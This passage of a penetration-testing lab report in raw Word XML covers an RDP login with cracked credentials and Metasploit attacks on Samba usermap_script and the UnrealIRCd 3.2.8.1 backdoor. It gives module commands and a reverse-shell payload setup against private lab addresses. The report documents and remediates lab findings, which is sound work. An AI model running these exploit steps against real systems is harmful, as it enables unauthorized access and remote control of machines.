        <w:t xml:space="preserve">   - </w:t>
      </w:r>
      <w:r w:rsidR="00BC4857">
        <w:t>I</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> successful unauthorized access to the target system via RDP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="190A8E9B" w14:textId="3747E7AB" w:rsidR="00D33387" w:rsidRPr="00D33387" w:rsidRDefault="00D33387" w:rsidP="00D3338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D33387">
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t>xfreerdp /v:192.168.2.1 /u:lara /p:qwerty</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E14C83F" w14:textId="479A3232" w:rsidR="004706AA" w:rsidRDefault="00D33387" w:rsidP="004706AA">
      <w:r w:rsidRPr="00D33387">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="01848527" wp14:editId="1E8BFA4D">
            <wp:extent cx="5943600" cy="4645660"/>
            <wp:effectExtent l="0" t="0" r="0" b="2540"/>
            <wp:docPr id="202726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64646" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId52"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="4645660"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="542E8DE9" w14:textId="77777777" w:rsidR="00D33387" w:rsidRDefault="00D33387" w:rsidP="004706AA"/>
    <w:p w14:paraId="46ED098E" w14:textId="77777777" w:rsidR="00314E34" w:rsidRDefault="00314E34" w:rsidP="00594F5E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6BA0927F" w14:textId="77777777" w:rsidR="00314E34" w:rsidRDefault="00314E34" w:rsidP="00594F5E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3192975C" w14:textId="0E94557F" w:rsidR="00594F5E" w:rsidRPr="004706AA" w:rsidRDefault="00594F5E" w:rsidP="00594F5E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004706AA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4.3.4 Recommendations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FC55FD7" w14:textId="77777777" w:rsidR="00594F5E" w:rsidRDefault="00594F5E" w:rsidP="00594F5E"/>
    <w:p w14:paraId="31FA9685" w14:textId="77777777" w:rsidR="00594F5E" w:rsidRDefault="00594F5E" w:rsidP="00594F5E">
      <w:r>
        <w:t>Enforce the use of strong passwords by imposing limitations on their complexity and changing them often.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="756D36DE" w14:textId="77777777" w:rsidR="00594F5E" w:rsidRDefault="00594F5E" w:rsidP="00594F5E">
      <w:r>
        <w:t>by preventing brute force login attempts by shutting off user accounts after a certain number of failed attempts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79DED895" w14:textId="77777777" w:rsidR="00594F5E" w:rsidRDefault="00594F5E" w:rsidP="00594F5E">
      <w:r>
        <w:t>Regularly check user accounts for weak or default passwords.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7527C8BB" w14:textId="77777777" w:rsidR="00594F5E" w:rsidRDefault="00594F5E" w:rsidP="00594F5E">
      <w:r>
        <w:t>To further strengthen security, multi-factor authentication (MFA) should be added to RDP access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="124CB0D6" w14:textId="77777777" w:rsidR="00594F5E" w:rsidRPr="0034765E" w:rsidRDefault="00594F5E" w:rsidP="00594F5E">
      <w:r>
        <w:t>Track and observe RDP login attempts to look for odd activity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48A59315" w14:textId="44546790" w:rsidR="004706AA" w:rsidRPr="0034765E" w:rsidRDefault="00594F5E" w:rsidP="00594F5E">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="405BB51B" w14:textId="77777777" w:rsidR="004706AA" w:rsidRPr="004706AA" w:rsidRDefault="004706AA" w:rsidP="004706AA">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
          <w:color w:val="000000"/>
          <w:u w:color="000000"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004706AA">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
          <w:color w:val="000000"/>
          <w:u w:color="000000"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>4.4 Attack 4: Metasploit Framework</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="193FACA5" w14:textId="77777777" w:rsidR="004706AA" w:rsidRDefault="004706AA" w:rsidP="004706AA"/>
    <w:p w14:paraId="2AF31B29" w14:textId="77777777" w:rsidR="00314E34" w:rsidRDefault="00314E34" w:rsidP="004706AA"/>
    <w:p w14:paraId="1B0B688D" w14:textId="77777777" w:rsidR="00314E34" w:rsidRDefault="00314E34" w:rsidP="004706AA"/>
    <w:p w14:paraId="3ACF0118" w14:textId="77777777" w:rsidR="004706AA" w:rsidRPr="004706AA" w:rsidRDefault="004706AA" w:rsidP="004706AA">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004706AA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4.4.1 Introduction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3269D6AD" w14:textId="77777777" w:rsidR="004706AA" w:rsidRDefault="004706AA" w:rsidP="004706AA"/>
    <w:p w14:paraId="04450095" w14:textId="16DF7956" w:rsidR="00594F5E" w:rsidRDefault="004706AA" w:rsidP="00594F5E">
      <w:r>
        <w:t xml:space="preserve">Metasploit Framework is a powerful tool used for developing and executing exploit code </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66340415" w14:textId="163E92D7" w:rsidR="00607D37" w:rsidRDefault="00607D37" w:rsidP="00594F5E">
      <w:r>
        <w:t xml:space="preserve">vulnerable systems. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="748D7D0E" w14:textId="77777777" w:rsidR="00607D37" w:rsidRDefault="00607D37" w:rsidP="00607D37"/>
    <w:p w14:paraId="46026618" w14:textId="77777777" w:rsidR="00314E34" w:rsidRDefault="00314E34" w:rsidP="00607D37"/>
    <w:p w14:paraId="63063A62" w14:textId="77777777" w:rsidR="00314E34" w:rsidRDefault="00314E34" w:rsidP="00607D37"/>
    <w:p w14:paraId="39DE4C9C" w14:textId="77777777" w:rsidR="00314E34" w:rsidRDefault="00314E34" w:rsidP="00607D37"/>
    <w:p w14:paraId="730383B6" w14:textId="77777777" w:rsidR="00607D37" w:rsidRPr="00607D37" w:rsidRDefault="00607D37" w:rsidP="00607D37">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00607D37">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 4.4.2 Methodology</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68E0C03F" w14:textId="77777777" w:rsidR="00607D37" w:rsidRDefault="00607D37" w:rsidP="00607D37"/>
    <w:p w14:paraId="113C16B8" w14:textId="7A1C8FE6" w:rsidR="00607D37" w:rsidRDefault="00EF395A" w:rsidP="00607D37">
      <w:r>
        <w:t>I</w:t>
      </w:r>
      <w:r w:rsidR="00607D37">
        <w:t xml:space="preserve"> utilize two vulnerabilities in the Samba and UnrealIRCd servers. These exploits leverage known vulnerabilities to gain unauthorized access to the target systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49403E8D" w14:textId="77777777" w:rsidR="00607D37" w:rsidRDefault="00607D37" w:rsidP="00607D37"/>
    <w:p w14:paraId="1AAD8434" w14:textId="77777777" w:rsidR="00314E34" w:rsidRDefault="00314E34" w:rsidP="00607D37"/>
    <w:p w14:paraId="05BD68A4" w14:textId="77777777" w:rsidR="00314E34" w:rsidRDefault="00314E34" w:rsidP="00607D37"/>
    <w:p w14:paraId="71B625D4" w14:textId="77777777" w:rsidR="00314E34" w:rsidRDefault="00314E34" w:rsidP="00607D37"/>
    <w:p w14:paraId="7C946C88" w14:textId="77777777" w:rsidR="00314E34" w:rsidRDefault="00314E34" w:rsidP="00607D37"/>
    <w:p w14:paraId="40AC796B" w14:textId="77777777" w:rsidR="00607D37" w:rsidRPr="00607D37" w:rsidRDefault="00607D37" w:rsidP="00607D37">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00607D37">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 4.4.3 Findings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33BAE1AD" w14:textId="77777777" w:rsidR="00607D37" w:rsidRDefault="00607D37" w:rsidP="00607D37"/>
    <w:p w14:paraId="412C3D4F" w14:textId="5938E573" w:rsidR="00607D37" w:rsidRPr="00607D37" w:rsidRDefault="00607D37" w:rsidP="00607D37">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00607D37">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00607D37">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Vulnerability Exploited: Samba usermap_script</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E284C3B" w14:textId="77777777" w:rsidR="00607D37" w:rsidRDefault="00607D37" w:rsidP="00607D37">
      <w:r w:rsidRPr="00607D37">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>- System Vulnerable:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Samba server running on 192.168.2.129</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B014D1F" w14:textId="77777777" w:rsidR="00607D37" w:rsidRDefault="00607D37" w:rsidP="00607D37">
      <w:r w:rsidRPr="00607D37">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>- Vulnerability Explanation:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> The Samba usermap_script vulnerability allows remote code execution by exploiting an issue in the handling of user-defined script paths.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BF8885C" w14:textId="77777777" w:rsidR="00607D37" w:rsidRDefault="00607D37" w:rsidP="00607D37">
      <w:r w:rsidRPr="00607D37">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>- Exploitation Technique:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Metasploit module `exploit/multi/samba/usermap_script`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6894130D" w14:textId="77777777" w:rsidR="00607D37" w:rsidRPr="00607D37" w:rsidRDefault="00607D37" w:rsidP="00607D37">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00607D37">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>- Exploit Steps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13ABCD91" w14:textId="6FF3B357" w:rsidR="00607D37" w:rsidRDefault="00607D37" w:rsidP="00607D37">
      <w:r>
        <w:t xml:space="preserve">    1. Set the target host RHOSTS to 192.168.2.129 and the local host LHOST to 192.168.2.128.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="740B5A60" w14:textId="77777777"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use exploit/multi/samba/usermap_script</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FFC93A6" w14:textId="01960A07"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set RHOSTS 192.168.2.129</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59C400D7" w14:textId="17B942B7"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set LHOST 192.168.2.128</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40F9E01C" w14:textId="77777777" w:rsidR="00607D37" w:rsidRDefault="00607D37" w:rsidP="00607D37">
      <w:r>
        <w:t xml:space="preserve">    2. Execute the exploit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59722510" w14:textId="48AB3199"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exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E1054E5" w14:textId="77777777" w:rsidR="00314E34" w:rsidRDefault="00314E34" w:rsidP="00607D37">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6FCA7EB0" w14:textId="77777777" w:rsidR="00314E34" w:rsidRDefault="00314E34" w:rsidP="00607D37">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="170AABC2" w14:textId="77777777" w:rsidR="00314E34" w:rsidRDefault="00314E34" w:rsidP="00607D37">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="397D5357" w14:textId="77777777" w:rsidR="00314E34" w:rsidRDefault="00314E34" w:rsidP="00607D37">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D1760FF" w14:textId="0F6BE6AE" w:rsidR="00607D37" w:rsidRPr="00607D37" w:rsidRDefault="00607D37" w:rsidP="00607D37">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00607D37">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>- Screenshot:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E876E27" w14:textId="5F1E8907" w:rsidR="00607D37" w:rsidRDefault="00607D37" w:rsidP="00607D37">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0034765E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4DBDE72D" wp14:editId="095A751B">
            <wp:extent cx="5943600" cy="469127"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="95972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23104" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId53"/>
                    <a:srcRect b="78636"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="469127"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="0034765E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6E4B326C" wp14:editId="55DA3A1E">
            <wp:extent cx="5943600" cy="995045"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="13866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4983" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId53"/>
                    <a:srcRect t="54679"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="995045"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="0034765E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AC4C44C" w14:textId="1C99A78F" w:rsidR="00607D37" w:rsidRDefault="00607D37" w:rsidP="00607D37"/>
    <w:p w14:paraId="69ABA1DA" w14:textId="77777777" w:rsidR="00607D37" w:rsidRDefault="00607D37" w:rsidP="00607D37">
      <w:r w:rsidRPr="00607D37">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>- Payload Execution:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Upon successful exploitation, a reverse shell is obtained, providing command execution capabilities on the target system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="786D06FA" w14:textId="77777777" w:rsidR="00607D37" w:rsidRDefault="00607D37" w:rsidP="00607D37">
      <w:r w:rsidRPr="00607D37">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>- Result:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Full access to the target system is achieved.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09B19C69" w14:textId="77777777" w:rsidR="00607D37" w:rsidRDefault="00607D37" w:rsidP="00607D37"/>
    <w:p w14:paraId="7DCA17B8" w14:textId="77777777" w:rsidR="00607D37" w:rsidRPr="00607D37" w:rsidRDefault="00607D37" w:rsidP="00607D37">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00607D37">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Vulnerability Exploited: UnrealIRCd 3.2.8.1 Backdoor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CFCFB28" w14:textId="77777777" w:rsidR="00607D37" w:rsidRDefault="00607D37" w:rsidP="00607D37">
      <w:r w:rsidRPr="00607D37">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>- System Vulnerable:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> UnrealIRCd server running on 192.168.2.129</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="203C1D8D" w14:textId="77777777" w:rsidR="00607D37" w:rsidRDefault="00607D37" w:rsidP="00607D37">
      <w:r w:rsidRPr="00607D37">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>- Vulnerability</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Explanation: The UnrealIRCd 3.2.8.1 backdoor vulnerability allows remote command execution due to a backdoor inserted into the source code by attackers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D4672E7" w14:textId="77777777" w:rsidR="00607D37" w:rsidRDefault="00607D37" w:rsidP="00607D37">
      <w:r w:rsidRPr="00607D37">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>- Exploitation Technique:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Metasploit module `exploit/unix/irc/unreal_ircd_3281_backdoor`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52B2E919" w14:textId="77777777" w:rsidR="00607D37" w:rsidRPr="00607D37" w:rsidRDefault="00607D37" w:rsidP="00607D37">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00607D37">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>- Exploit Steps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34A5547A" w14:textId="77777777" w:rsidR="00607D37" w:rsidRDefault="00607D37" w:rsidP="00607D37">
      <w:r>
        <w:t xml:space="preserve">    1. Set the payload to `cmd/unix/reverse` for reverse shell execution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DCDB10C" w14:textId="77777777"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use exploit/unix/irc/unreal_ircd_3281_backdoor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24CF0E7E" w14:textId="370E0DB9"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set payload cmd/unix/reverse</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45A6917B" w14:textId="77777777" w:rsidR="00607D37" w:rsidRDefault="00607D37" w:rsidP="00607D37">
      <w:r>
        <w:t xml:space="preserve">    2. Set the target host (`RHOSTS`) to 192.168.2.129 and the local host (`LHOST`) to 192.168.2.128.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E0784E9" w14:textId="77777777"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set RHOSTS 192.168.2.129</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48E4D2A1" w14:textId="6182C37F"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set LHOST 192.168.2.128</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2227E843" w14:textId="77777777" w:rsidR="00607D37" w:rsidRDefault="00607D37" w:rsidP="00607D37">
      <w:r>
        <w:t xml:space="preserve">    3. Execute the exploit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1051A0FD" w14:textId="36C4CEB1" w:rsidR="00607D37" w:rsidRPr="00607D37" w:rsidRDefault="00607D37" w:rsidP="00607D37">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="262626" w:themeFill="text1" w:themeFillTint="D9"/>
        <w:ind w:left="810" w:hanging="450"/>
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00607D37">
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t>exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="736A1DBE" w14:textId="77777777" w:rsidR="00314E34" w:rsidRDefault="00314E34" w:rsidP="00607D37">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35D9CAA7" w14:textId="77777777" w:rsidR="00314E34" w:rsidRDefault="00314E34" w:rsidP="00607D37">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5FF95EC0" w14:textId="77777777" w:rsidR="00314E34" w:rsidRDefault="00314E34" w:rsidP="00607D37">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F54B4C9" w14:textId="77777777" w:rsidR="00314E34" w:rsidRDefault="00314E34" w:rsidP="00607D37">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6783C6AA" w14:textId="77777777" w:rsidR="00314E34" w:rsidRDefault="00314E34" w:rsidP="00607D37">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72FD9121" w14:textId="77777777" w:rsidR="00314E34" w:rsidRDefault="00314E34" w:rsidP="00607D37">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4538FD1A" w14:textId="77777777" w:rsidR="00314E34" w:rsidRDefault="00314E34" w:rsidP="00607D37">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B98EF7F" w14:textId="77777777" w:rsidR="00314E34" w:rsidRDefault="00314E34" w:rsidP="00607D37">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1235B4B7" w14:textId="77777777" w:rsidR="00314E34" w:rsidRDefault="00314E34" w:rsidP="00607D37">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2DB4A56D" w14:textId="77777777" w:rsidR="00314E34" w:rsidRDefault="00314E34" w:rsidP="00607D37">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20A3D08D" w14:textId="77777777" w:rsidR="00314E34" w:rsidRDefault="00314E34" w:rsidP="00607D37">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70061E3D" w14:textId="063B010C" w:rsidR="00607D37" w:rsidRPr="00607D37" w:rsidRDefault="00607D37" w:rsidP="00607D37">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00607D37">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>- Screenshot:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16744355" w14:textId="478464A0" w:rsidR="00607D37" w:rsidRDefault="00607D37" w:rsidP="00607D37">
      <w:r w:rsidRPr="0034765E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2016DBAF" wp14:editId="5DDD19E5">
            <wp:extent cx="5943600" cy="3479800"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="124396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62547" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId54"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3479800"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0547C2CA" w14:textId="77777777" w:rsidR="00607D37" w:rsidRDefault="00607D37" w:rsidP="00607D37">
      <w:r w:rsidRPr="00607D37">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>- Payload Execution:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> The exploit provides a reverse shell, granting command execution capabilities on the target system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D08679F" w14:textId="77777777" w:rsidR="00607D37" w:rsidRDefault="00607D37" w:rsidP="00607D37">
      <w:r w:rsidRPr="00607D37">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>- Result:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Full access to the target system is achieved.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="367C06FE" w14:textId="77777777" w:rsidR="00607D37" w:rsidRDefault="00607D37" w:rsidP="00607D37"/>
    <w:p w14:paraId="6D665A86" w14:textId="77777777" w:rsidR="00314E34" w:rsidRDefault="00314E34" w:rsidP="00607D37"/>
    <w:p w14:paraId="792DB28A" w14:textId="77777777" w:rsidR="00314E34" w:rsidRDefault="00314E34" w:rsidP="00607D37"/>
    <w:p w14:paraId="21C2F79D" w14:textId="77777777" w:rsidR="00314E34" w:rsidRDefault="00314E34" w:rsidP="00607D37"/>
